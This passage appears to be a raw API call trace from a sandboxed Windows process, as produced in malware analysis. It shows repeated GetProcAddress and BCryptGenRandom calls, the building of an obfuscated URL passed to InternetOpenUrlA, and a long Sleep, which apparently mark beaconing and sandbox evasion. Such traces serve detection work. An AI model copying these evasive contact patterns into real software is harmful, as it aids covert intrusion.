0x7ffc5bcc36b0 [0241.787] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.787] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0241.788] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4c7f, cbBuffer=0x26, dwFlags=0x2 | out: pbBuffer=0x4d4c7f) returned 0x0 [0241.788] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.788] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.788] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.789] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.789] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.789] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.789] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.789] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.790] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.790] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.790] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.790] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.790] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.790] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.790] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.791] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.791] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.791] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.791] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.791] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.791] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.791] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.791] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.791] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.791] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.792] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.792] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.792] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.792] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.792] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.793] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.793] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.793] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.794] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.795] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.795] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.795] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.795] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.795] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.795] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.795] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.795] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0241.796] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.796] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4ca5, cbBuffer=0x31, dwFlags=0x2 | out: pbBuffer=0x4d4ca5) returned 0x0 [0241.796] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.796] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.798] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.798] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0241.798] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.798] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.798] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.798] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.798] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.798] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.799] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.799] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.799] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.799] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.799] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.799] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.799] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.799] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.799] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0241.799] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0241.800] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.029] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.030] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.030] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.030] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.030] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.031] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.031] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.031] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.031] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.031] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.031] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.031] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.031] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.031] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.032] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.032] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.032] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.032] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.032] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.032] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.032] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.032] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.032] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.032] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.032] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.033] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.033] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.033] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.033] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.033] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.033] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.033] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.033] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0242.033] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.033] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.034] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.034] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.034] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.034] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.034] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.034] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.034] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.034] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.034] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.034] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.035] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.035] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.035] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.035] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0242.035] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.035] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.035] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.035] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.035] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.035] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.035] GetProcessHeap () returned 0x440000 [0242.035] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472b10 [0242.036] lstrcpyA (in: lpString1=0x472b10, lpString2="@LM" | out: lpString1="@LM") returned="@LM" [0242.036] lstrcatA (in: lpString1="@LM", lpString2="/9cdvoGy2zYNdvxuT06an2TlxA9/wp1IocUeVeSuroipgp9vja32Hlk1rwwj1j/p7Evgdy9d2m27vyvWpmdk7apC08fbffxyT0u0/k2Vqtp9hfufqgcwmU3hvcqvdia85s35hhnKhghhtygfMx2fa/" | out: lpString1="@LM/9cdvoGy2zYNdvxuT06an2TlxA9/wp1IocUeVeSuroipgp9vja32Hlk1rwwj1j/p7Evgdy9d2m27vyvWpmdk7apC08fbffxyT0u0/k2Vqtp9hfufqgcwmU3hvcqvdia85s35hhnKhghhtygfMx2fa/") returned="@LM/9cdvoGy2zYNdvxuT06an2TlxA9/wp1IocUeVeSuroipgp9vja32Hlk1rwwj1j/p7Evgdy9d2m27vyvWpmdk7apC08fbffxyT0u0/k2Vqtp9hfufqgcwmU3hvcqvdia85s35hhnKhghhtygfMx2fa/" [0242.036] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0242.036] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="@LM/9cdvoGy2zYNdvxuT06an2TlxA9/wp1IocUeVeSuroipgp9vja32Hlk1rwwj1j/p7Evgdy9d2m27vyvWpmdk7apC08fbffxyT0u0/k2Vqtp9hfufqgcwmU3hvcqvdia85s35hhnKhghhtygfMx2fa/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0242.036] GetProcessHeap () returned 0x440000 [0242.036] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472b10 | out: hHeap=0x440000) returned 1 [0242.036] GetProcessHeap () returned 0x440000 [0242.036] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d4c40 | out: hHeap=0x440000) returned 1 [0242.036] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0242.036] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0242.036] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.037] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0242.037] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0242.037] Sleep (dwMilliseconds=0x17e6f) [0242.349] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.349] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0242.349] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.349] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0242.349] GetProcessHeap () returned 0x440000 [0242.349] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a02050 [0242.349] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.349] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0242.349] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.349] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02051, cbBuffer=0x17, dwFlags=0x2 | out: pbBuffer=0x3a02051) returned 0x0 [0242.350] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.350] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.350] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.350] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.350] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.350] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.350] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.350] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.350] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.350] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.350] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.351] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.351] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.351] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.351] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.352] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.352] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 